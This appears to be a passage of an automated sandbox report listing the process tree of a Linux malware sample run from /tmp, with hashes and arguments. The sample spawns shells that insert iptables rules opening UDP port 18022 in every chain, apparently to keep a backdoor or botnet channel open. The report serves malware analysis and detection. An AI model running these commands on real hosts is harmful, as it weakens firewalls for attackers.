                                                                                                                                Arguments:iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:25
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p udp --dport 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:26
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/upstart
                                                                                                                                Arguments:n/a
                                                                                                                                File size:0 bytes
                                                                                                                                MD5 hash:00000000000000000000000000000000

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/date
                                                                                                                                Arguments:date
                                                                                                                                File size:68464 bytes
                                                                                                                                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/share/apport/apport-checkreports
                                                                                                                                Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                                                File size:1269 bytes
                                                                                                                                MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/upstart
                                                                                                                                Arguments:n/a
                                                                                                                                File size:0 bytes
                                                                                                                                MD5 hash:00000000000000000000000000000000

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/date
                                                                                                                                Arguments:date
                                                                                                                                File size:68464 bytes
                                                                                                                                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/share/apport/apport-gtk
                                                                                                                                Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                                File size:23806 bytes
                                                                                                                                MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/upstart
                                                                                                                                Arguments:n/a
                                                                                                                                File size:0 bytes
                                                                                                                                MD5 hash:00000000000000000000000000000000

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:47
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/date
                                                                                                                                Arguments:date
                                                                                                                                File size:68464 bytes
                                                                                                                                MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                                                General

                                                                                                                                Start time:17:51:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:48
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/share/apport/apport-gtk
                                                                                                                                Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                                                File size:23806 bytes
                                                                                                                                MD5 hash:ec58a49a30ef6a29406a204f28cc7d87